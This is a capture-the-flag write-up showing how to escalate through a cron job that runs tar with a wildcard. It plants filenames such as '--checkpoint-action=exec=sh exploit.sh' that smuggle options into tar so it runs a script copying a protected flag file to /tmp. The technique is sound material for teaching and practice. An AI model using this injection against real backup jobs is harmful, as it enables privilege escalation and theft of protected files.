Our admins take their backup policies very seriously. Every single second they “/bin/tar czf *” our entire home directory. Can you trick the admin’s into leaking the flag?
First lets check who we are:
bash-4.3$ whoami
notroot
Anything interesting in our home dir:
bash-4.3$ cd /home/notroot/
bash-4.3$ ls
What is running on the system:
bash-4.3$ ps
PID USER TIME COMMAND
1 root 0:25 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisord.conf
9 flag 0:07 {cron.sh} /bin/sh /home/flag/cron.sh
10 notroot 0:00 /usr/bin/ttyd -g 1000 -u 1000 -x /bin/bash
6046 notroot 0:00 /bin/bash
28646 flag 0:00 /bin/tar czf /home/flag/backup.tar *
28647 flag 0:00 /bin/sh -c gzip
28648 notroot 0:00 ps
That /home/flag looks promising, lets investigate:
bash-4.3$ cd /home/
bash-4.3$ ls
flag notroot
bash-4.3$ ls flag/
backup.tar cron.sh flag_c6b0057b3d798b0.txt
bash-4.3$ cat flag/flag_c6b0057b3d798b0.txt
cat: can't open 'flag/flag_c6b0057b3d798b0.txt': Permission denied
bash-4.3$ ls -la flag/
total 12
drwxr-sr-x 1 flag flag 24 Nov 17 16:11 .
drwxr-xr-x 1 root root 33 Nov 16 10:55 ..
-rw-r--r-- 1 flag flag 197 Nov 17 16:11 backup.tar
-r-x------ 1 flag flag 134 Jan 25 2020 cron.sh
-r-------- 1 flag flag 41 Jan 25 2020 flag_c6b0057b3d798b0.txt
Check what can we do with tar and wildcards, you can search the web for the exploit, or look into the help for tips:
bash-4.3$ tar --help
...
--checkpoint[=NUMBER] display progress messages every NUMBERth record
(default 10)
--checkpoint-action=ACTION execute ACTION on each checkpoint
...
As superuser executes the “backup” command over whole /home, we can put the exploit in our home folder:
bash-4.3$ cd /home/notroot/
bash-4.3$ echo 'cat /home/flag/flag_c6b0057b3d798b0.txt > /tmp/flag.txt' > exploit.sh
bash-4.3$ echo "" > "--checkpoint-action=exec=sh exploit.sh"
bash-4.3$ echo "" > --checkpoint=1
Basically we want tar to use filenames as parameters and run whatever we put into exploit.sh.
In our case, we know that flag is stored in /home/flag/flag_c6b0057b3d798b0.txt and we want to write it to a file.
Be careful, we need to set destination file to something user flag can write into, so that is why we choose /tmp/flag.txt.
Using ~/flag.txt won’t work, as flag has no permissions to write in /home/notroot.
We know that because of the output of the ps above, where we can see that tar is ran by flag user.
We wait a second, so that cron is executed and we can obtain the flag:
bash-4.3$ cat /tmp/flag.txt
247CTF{xxx}